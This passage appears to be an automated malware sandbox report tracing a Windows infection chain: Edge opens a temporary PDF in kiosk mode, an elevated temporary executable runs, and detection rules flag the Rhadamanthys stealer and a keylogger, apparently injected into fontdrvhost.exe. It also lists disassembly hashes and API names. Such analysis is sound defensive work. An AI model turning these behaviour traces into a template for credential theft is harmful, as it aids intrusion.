                                                                                                                                                                                                                                                                  Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=7060 --field-trial-handle=2484,i,14725035999492342870,3352432587190736551,262144 /prefetch:8
                                                                                                                                                                                                                                                                  Imagebase:0x7ff6f2da0000
                                                                                                                                                                                                                                                                  File size:1'255'976 bytes
                                                                                                                                                                                                                                                                  MD5 hash:F8CEC3E43A6305AC9BA3700131594306
                                                                                                                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                                  Target ID:25
                                                                                                                                                                                                                                                                  Start time:07:44:29
                                                                                                                                                                                                                                                                  Start date:19/12/2024
                                                                                                                                                                                                                                                                  Path:C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\identity_helper.exe
                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                  Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=7060 --field-trial-handle=2484,i,14725035999492342870,3352432587190736551,262144 /prefetch:8
                                                                                                                                                                                                                                                                  Imagebase:0x7ff7934f0000
                                                                                                                                                                                                                                                                  File size:1'255'976 bytes
                                                                                                                                                                                                                                                                  MD5 hash:F8CEC3E43A6305AC9BA3700131594306
                                                                                                                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                                  Target ID:26
                                                                                                                                                                                                                                                                  Start time:07:44:32
                                                                                                                                                                                                                                                                  Start date:19/12/2024
                                                                                                                                                                                                                                                                  Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                  Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --lang=en-GB --service-sandbox-type=collections --mojo-platform-channel-handle=7920 --field-trial-handle=2484,i,14725035999492342870,3352432587190736551,262144 /prefetch:8
                                                                                                                                                                                                                                                                  Imagebase:0x7ff715da0000
                                                                                                                                                                                                                                                                  File size:4'210'216 bytes
                                                                                                                                                                                                                                                                  MD5 hash:BF154738460E4AB1D388970E1AB13FAB
                                                                                                                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                                  Target ID:28
                                                                                                                                                                                                                                                                  Start time:07:44:36
                                                                                                                                                                                                                                                                  Start date:19/12/2024
                                                                                                                                                                                                                                                                  Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                  Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --kiosk C:\Users\user\AppData\Local\Temp\6d0157c6-3d7d-48ab-8ec3-f1e0d1f3d02e.pdf
                                                                                                                                                                                                                                                                  Imagebase:0x7ff715da0000
                                                                                                                                                                                                                                                                  File size:4'210'216 bytes
                                                                                                                                                                                                                                                                  MD5 hash:BF154738460E4AB1D388970E1AB13FAB
                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                                  Target ID:29
                                                                                                                                                                                                                                                                  Start time:07:44:38
                                                                                                                                                                                                                                                                  Start date:19/12/2024
                                                                                                                                                                                                                                                                  Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                  Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2212 --field-trial-handle=2144,i,12226870336135791064,6646612057330191858,262144 /prefetch:3
                                                                                                                                                                                                                                                                  Imagebase:0x7ff715da0000
                                                                                                                                                                                                                                                                  File size:4'210'216 bytes
                                                                                                                                                                                                                                                                  MD5 hash:BF154738460E4AB1D388970E1AB13FAB
                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                                  Target ID:30
                                                                                                                                                                                                                                                                  Start time:07:44:38
                                                                                                                                                                                                                                                                  Start date:19/12/2024
                                                                                                                                                                                                                                                                  Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                  Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=ppapi --lang=en-GB --device-scale-factor=1 --ppapi-antialiased-text-enabled=1 --ppapi-subpixel-rendering-setting=1 --mojo-platform-channel-handle=8232 --field-trial-handle=2484,i,14725035999492342870,3352432587190736551,262144 /prefetch:6
                                                                                                                                                                                                                                                                  Imagebase:0x7ff715da0000
                                                                                                                                                                                                                                                                  File size:4'210'216 bytes
                                                                                                                                                                                                                                                                  MD5 hash:BF154738460E4AB1D388970E1AB13FAB
                                                                                                                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                                  Target ID:32
                                                                                                                                                                                                                                                                  Start time:07:44:46
                                                                                                                                                                                                                                                                  Start date:19/12/2024
                                                                                                                                                                                                                                                                  Path:C:\Users\user\AppData\Local\Temp\148337f5-05f1-4aaa-b5bc-69ff3b8bcafe.exe
                                                                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                                                                  Commandline:"C:\Users\user\AppData\Local\Temp\148337f5-05f1-4aaa-b5bc-69ff3b8bcafe.exe"
                                                                                                                                                                                                                                                                  Imagebase:0x400000
                                                                                                                                                                                                                                                                  File size:2'949'120 bytes
                                                                                                                                                                                                                                                                  MD5 hash:F7A506F00E525E6D23AEE43D34219625
                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                                  Target ID:33
                                                                                                                                                                                                                                                                  Start time:07:45:04
                                                                                                                                                                                                                                                                  Start date:19/12/2024
                                                                                                                                                                                                                                                                  Path:C:\Users\user\AppData\Local\Temp\148337f5-05f1-4aaa-b5bc-69ff3b8bcafe.exe
                                                                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                                                                  Commandline:"C:\Users\user\AppData\Local\Temp\148337f5-05f1-4aaa-b5bc-69ff3b8bcafe.exe"
                                                                                                                                                                                                                                                                  Imagebase:0x400000
                                                                                                                                                                                                                                                                  File size:2'949'120 bytes
                                                                                                                                                                                                                                                                  MD5 hash:F7A506F00E525E6D23AEE43D34219625
                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                  Yara matches:
                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 00000021.00000003.2759520208.00000000029C0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000021.00000003.2763809170.0000000004E70000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 00000021.00000002.2772213899.0000000002AD0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000021.00000003.2764066518.0000000005090000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                                  Target ID:34
                                                                                                                                                                                                                                                                  Start time:07:45:06
                                                                                                                                                                                                                                                                  Start date:19/12/2024
                                                                                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\fontdrvhost.exe
                                                                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                                                                  Commandline:"C:\Windows\System32\fontdrvhost.exe"
                                                                                                                                                                                                                                                                  Imagebase:0xd40000
                                                                                                                                                                                                                                                                  File size:676'584 bytes
                                                                                                                                                                                                                                                                  MD5 hash:8D0DA0C5DCF1A14F9D65F5C0BEA53F3D
                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                  Yara matches:
                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 00000022.00000003.2765653273.0000000003420000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 00000022.00000002.2879586612.0000000003430000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000022.00000003.2769625867.00000000054C0000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000022.00000003.2770000579.00000000056E0000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                                  Target ID:37
                                                                                                                                                                                                                                                                  Start time:07:45:06
                                                                                                                                                                                                                                                                  Start date:19/12/2024
                                                                                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                                                                  Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 8812 -s 440
                                                                                                                                                                                                                                                                  Imagebase:0xce0000
                                                                                                                                                                                                                                                                  File size:483'680 bytes
                                                                                                                                                                                                                                                                  MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                                  Target ID:39
                                                                                                                                                                                                                                                                  Start time:07:45:17
                                                                                                                                                                                                                                                                  Start date:19/12/2024
                                                                                                                                                                                                                                                                  Path:C:\Windows\System32\fontdrvhost.exe
                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                  Commandline:"C:\Windows\System32\fontdrvhost.exe"
                                                                                                                                                                                                                                                                  Imagebase:0x7ff7d9200000
                                                                                                                                                                                                                                                                  File size:827'408 bytes
                                                                                                                                                                                                                                                                  MD5 hash:BBCB897697B3442657C7D6E3EDDBD25F
                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                                  Target ID:41
                                                                                                                                                                                                                                                                  Start time:07:45:20
                                                                                                                                                                                                                                                                  Start date:19/12/2024
                                                                                                                                                                                                                                                                  Path:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\WerFault.exe -u -p 9048 -s 140
                                                                                                                                                                                                                                                                  Imagebase:0x7ff7192c0000
                                                                                                                                                                                                                                                                  File size:570'736 bytes
                                                                                                                                                                                                                                                                  MD5 hash:FD27D9F6D02763BDE32511B5DF7FF7A0
                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                                  Target ID:42
                                                                                                                                                                                                                                                                  Start time:07:45:23
                                                                                                                                                                                                                                                                  Start date:19/12/2024
                                                                                                                                                                                                                                                                  Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                  Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-GB --service-sandbox-type=search_indexer --message-loop-type-ui --mojo-platform-channel-handle=6752 --field-trial-handle=2484,i,14725035999492342870,3352432587190736551,262144 /prefetch:8
                                                                                                                                                                                                                                                                  Imagebase:0x7ff715da0000
                                                                                                                                                                                                                                                                  File size:4'210'216 bytes
                                                                                                                                                                                                                                                                  MD5 hash:BF154738460E4AB1D388970E1AB13FAB
                                                                                                                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                                                                                                  Disassembly

                                                                                                                                                                                                                                                                  Reset < >

                                                                                                                                                                                                                                                                    Executed Functions

                                                                                                                                                                                                                                                                    Function 00007FFD346A33B5 Relevance: .0, Instructions: 49COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2482524419.00007FFD346A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD346A0000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_7ffd346a0000_powershell.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                    • Opcode ID: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                                                                                                                                                                                                                                                    • Instruction ID: 24aef6e58671a62f14222a864d5608cc4645e75a5eb2213a00036e05fa3ae6e9
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1401677121CB0C4FD784EF0CE451AA5B7E0FB95364F10056DE58AC3651DA36E882CB45

                                                                                                                                                                                                                                                                    Executed Functions

                                                                                                                                                                                                                                                                    Function 00007FFD346DA66D Relevance: .3, Instructions: 286COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000016.00000002.2692901328.00007FFD346D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD346D0000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_22_2_7ffd346d0000_powershell.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                    • Opcode ID: 89f28ba9483232d0372dee9fe905c49f227e32caaac7e2a1cb192d7434fb7260
                                                                                                                                                                                                                                                                    • Instruction ID: a574d925d7d0b3642c41dd6e4c1b41a4fefccb63dacd07d1090531588c2c7fae
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 89f28ba9483232d0372dee9fe905c49f227e32caaac7e2a1cb192d7434fb7260
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 68A1F131A0EA884FEB65DB688C657A9BBE0EF53314F1041EFC08DD7193DA389949CB41
                                                                                                                                                                                                                                                                    Function 00007FFD347A34FE Relevance: .1, Instructions: 59COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000016.00000002.2693795879.00007FFD347A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD347A0000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_22_2_7ffd347a0000_powershell.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                    • Opcode ID: febddc85bea196e8acb056dfb8587d63eb9b8ae8de75664b8e05b6eb64a5efe6
                                                                                                                                                                                                                                                                    • Instruction ID: 042e41e290791e333dc0862d1655f6ad006f39799dfaf77b985e93c06d7faa26
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: febddc85bea196e8acb056dfb8587d63eb9b8ae8de75664b8e05b6eb64a5efe6
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 29110A71B0E6894FEB95DBAC50A55B87BD1EF5A310B1401BFC50DD7243DE296845C350
                                                                                                                                                                                                                                                                    Function 00007FFD346D3875 Relevance: .0, Instructions: 49COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000016.00000002.2692901328.00007FFD346D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD346D0000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_22_2_7ffd346d0000_powershell.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                    • Opcode ID: 582908582f657131c1f04ed76f34d09c60f6b2c2f8b724a61ceffa3ac25bcdd6
                                                                                                                                                                                                                                                                    • Instruction ID: 3521a79773c0e8ba3515b6a5c47e1ad79e3400368a0fa8ed5b034ec85f02e96b
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 582908582f657131c1f04ed76f34d09c60f6b2c2f8b724a61ceffa3ac25bcdd6
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9301677121CB0C4FD748EF0CE451AA5B7E0FB95364F10056EE58AC3655D636E881CB45

                                                                                                                                                                                                                                                                    Non-executed Functions

                                                                                                                                                                                                                                                                    Function 00007FFD346DC308 Relevance: .8, Instructions: 754COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000016.00000002.2692901328.00007FFD346D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD346D0000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_22_2_7ffd346d0000_powershell.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                    • Opcode ID: ef48b4cf9ca840ec2128ea465a33ce046baab83dbfd4da4adf3e7e674be4c44c
                                                                                                                                                                                                                                                                    • Instruction ID: 48696a646fe02268120ee0bdc131cc0934fd9e5d6a3c016a565335f914cafa04
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ef48b4cf9ca840ec2128ea465a33ce046baab83dbfd4da4adf3e7e674be4c44c
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: AF32F762B0E7DA4FE755DE2C98E50EA7BE0EF53328B0900BBC189C7193DE1968079751
                                                                                                                                                                                                                                                                    Function 00007FFD346DB94F Relevance: .3, Instructions: 288COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000016.00000002.2692901328.00007FFD346D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD346D0000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_22_2_7ffd346d0000_powershell.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                    • Opcode ID: 20496ba66bd8b959ba4e5f9e2694a6aac8bf20ece3c290ab33b8249a0024bf52
                                                                                                                                                                                                                                                                    • Instruction ID: e44827cbe8786d5e9ac6c805f8da61e52048d825e5aa703fa1481e0a76b96f78
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 20496ba66bd8b959ba4e5f9e2694a6aac8bf20ece3c290ab33b8249a0024bf52
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 53A1A8A6A0E6D25FF7129A7D58F60D63FA0EF1362CB0D01FBC589CA097ED0D19079252

                                                                                                                                                                                                                                                                    Non-executed Functions

                                                                                                                                                                                                                                                                    Function 004149D0 Relevance: 37.3, APIs: 13, Strings: 8, Instructions: 569COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • PathRemoveFileSpecW.SHLWAPI(00000000,00000001,?,004AF2A8,00000001), ref: 00414C52
                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32(004AF2AC,00000002,00000001,?,004AF2A8,00000001), ref: 00414C65
                                                                                                                                                                                                                                                                      • Part of subcall function 004151D0: CloseHandle.KERNEL32(00000000,?,00414C7F,?), ref: 004151DB
                                                                                                                                                                                                                                                                      • Part of subcall function 004151D0: DestroyEnvironmentBlock.USERENV(00000000,?,00414C7F,?), ref: 004151E9
                                                                                                                                                                                                                                                                      • Part of subcall function 004151D0: CloseHandle.KERNEL32(00000000,?,00414C7F,?), ref: 004151F7
                                                                                                                                                                                                                                                                      • Part of subcall function 004151D0: CloseHandle.KERNEL32(00000000,?,00414C7F,?), ref: 00415205
                                                                                                                                                                                                                                                                      • Part of subcall function 004151D0: CloseHandle.KERNEL32(00000000,?,00414C7F,?), ref: 00415212
                                                                                                                                                                                                                                                                      • Part of subcall function 004151D0: CloseHandle.KERNEL32(?,?,00414C7F,?), ref: 00415226
                                                                                                                                                                                                                                                                      • Part of subcall function 004151D0: CloseHandle.KERNEL32(00000000,?,00414C7F,?), ref: 0041523F
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000020.00000002.2801119476.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801084067.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801216504.000000000049E000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801265458.00000000004C4000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801296981.00000000004C5000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801336588.00000000004CA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801336588.0000000000552000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801336588.000000000056C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801336588.000000000059D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801336588.00000000005A5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801601594.00000000005E8000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801664374.0000000000658000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801698779.000000000065B000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801735190.0000000000663000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801771222.0000000000666000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801806301.000000000066B000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801846980.000000000066E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801889061.0000000000674000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801928115.0000000000679000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801974512.00000000006A8000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2802010104.00000000006AB000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2802059687.00000000006D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_32_2_400000_148337f5-05f1-4aaa-b5bc-69ff3b8bcafe.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: CloseHandle$BlockDestroyEnvironmentErrorFileLastPathRemoveSpec
                                                                                                                                                                                                                                                                    • String ID: D$In ProcessUtils::utilCreateProcessInUserSessionWithReturnCode.$In ProcessUtils::utilCreateProcessInUserSessionWithReturnCode. Error in createProcessInUserSession with error %d.$In ProcessUtils::utilCreateProcessInUserSessionWithReturnCode. Error in utilRemoveFileSpec in currentDirectory %s $In ProcessUtils::utilCreateProcessInUserSessionWithReturnCode. Return$In ProcessUtils::utilCreateProcessInUserSessionWithReturnCode. WaitForFinish is false. Returning$OOBEUtils$ProcessUtils
                                                                                                                                                                                                                                                                    • API String ID: 2934398582-495172292
                                                                                                                                                                                                                                                                    • Opcode ID: b1d8b08e1ced0472de58a44bdc32ac5145ca0abbc8f526ddc3a30321f6e8c4e6
                                                                                                                                                                                                                                                                    • Instruction ID: 44ddc1e84410081819ab0d6c29ceb37a1c44936693579239e334559e60437c79
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b1d8b08e1ced0472de58a44bdc32ac5145ca0abbc8f526ddc3a30321f6e8c4e6
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C422C130A40219DBDB10DF54CD5ABEE77B4BF95704F2401AAE80577290DBB86E90CFA9
                                                                                                                                                                                                                                                                    Function 004029A0 Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 247COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000020.00000002.2801119476.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
